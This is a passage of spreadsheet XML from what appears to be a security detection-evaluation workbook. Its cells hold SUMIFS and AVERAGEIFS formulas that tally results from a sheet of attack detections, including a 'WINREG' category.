        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK37 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="FM37" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK37 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="FN37" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK37 &amp; "*")</f>
        <v>11</v>
      </c>
      <c r="FO37" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK37 &amp; "*")</f>
        <v>17</v>
      </c>
      <c r="FP37" s="392"/>
      <c r="FQ37" s="303" t="s">
        <v>310</v>
      </c>
      <c r="FR37" s="69">
        <f t="shared" ref="FR37:FU37" si="22">1-(FL37/EJ39)</f>
        <v>0</v>
      </c>
      <c r="FS37" s="69">
        <f t="shared" si="22"/>
        <v>0.3333333333</v>
      </c>
      <c r="FT37" s="69">
        <f t="shared" si="22"/>
        <v>0.2142857143</v>
      </c>
      <c r="FU37" s="306">
        <f t="shared" si="22"/>
        <v>0.4137931034</v>
      </c>
      <c r="FV37" s="392"/>
      <c r="FW37" s="392"/>
      <c r="FX37" s="392"/>
      <c r="FY37" s="392"/>
      <c r="FZ37" s="392"/>
      <c r="GA37" s="392"/>
      <c r="GB37" s="392"/>
      <c r="GC37" s="392"/>
      <c r="GD37" s="392"/>
      <c r="GE37" s="392"/>
      <c r="GF37" s="392"/>
      <c r="GG37" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="GH37" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GI37" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GJ37" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GK37" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="GL37" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GM37" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GN37" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>1</v>
      </c>
      <c r="GO37" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="GP37" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GQ37" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GR37" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GS37" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="GT37" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GU37" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GV37" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG37)</f>
        <v>0</v>
      </c>
      <c r="GW37" s="392"/>
      <c r="GX37" s="392"/>
      <c r="GY37" s="392"/>
      <c r="GZ37" s="392"/>
      <c r="HA37" s="392"/>
      <c r="HB37" s="392"/>
      <c r="HC37" s="392"/>
      <c r="HD37" s="392"/>
      <c r="HE37" s="392"/>
      <c r="HF37" s="392"/>
      <c r="HG37" s="392"/>
      <c r="HH37" s="392"/>
      <c r="HI37" s="392"/>
      <c r="HJ37" s="392"/>
      <c r="HK37" s="392"/>
      <c r="HL37" s="392"/>
      <c r="HM37" s="392"/>
      <c r="HN37" s="392"/>
      <c r="HO37" s="392"/>
      <c r="HP37" s="392"/>
    </row>
    <row r="38">
      <c r="B38" s="277"/>
      <c r="C38" s="271"/>
      <c r="D38" s="271"/>
      <c r="E38" s="271"/>
      <c r="F38" s="271"/>
      <c r="G38" s="278"/>
      <c r="J38" s="277"/>
      <c r="K38" s="376"/>
      <c r="L38" s="377"/>
      <c r="M38" s="377"/>
      <c r="N38" s="378"/>
      <c r="O38" s="278"/>
      <c r="Q38" s="271"/>
      <c r="R38" s="386" t="s">
        <v>2481</v>
      </c>
      <c r="S38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1304</v>
      </c>
      <c r="T38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1253</v>
      </c>
      <c r="U38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>117</v>
      </c>
      <c r="V38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="W38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>14120</v>
      </c>
      <c r="Y38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="Z38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>22716</v>
      </c>
      <c r="AA38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>184</v>
      </c>
      <c r="AB38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>65</v>
      </c>
      <c r="AC38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>27</v>
      </c>
      <c r="AD38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>138</v>
      </c>
      <c r="AE38" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>9</v>
      </c>
      <c r="AF38" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>575</v>
      </c>
      <c r="AG38" s="271"/>
      <c r="AH38" s="386" t="s">
        <v>2481</v>
      </c>
      <c r="AI38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>1298</v>
      </c>
      <c r="AJ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>6</v>
      </c>
      <c r="AL38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1253</v>
      </c>
      <c r="AN38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>2</v>
      </c>
      <c r="AS38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>12</v>
      </c>
      <c r="AY38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>14116</v>
      </c>
      <c r="BD38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>9</v>
      </c>
      <c r="BL38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>19607</v>
      </c>
      <c r="BN38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>3108</v>
      </c>
      <c r="BO38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>11</v>
      </c>
      <c r="BR38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>5</v>
      </c>
      <c r="BT38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>30</v>
      </c>
      <c r="BZ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>2</v>
      </c>
      <c r="CI38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>22</v>
      </c>
      <c r="CJ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>6</v>
      </c>
      <c r="CL38" s="355">
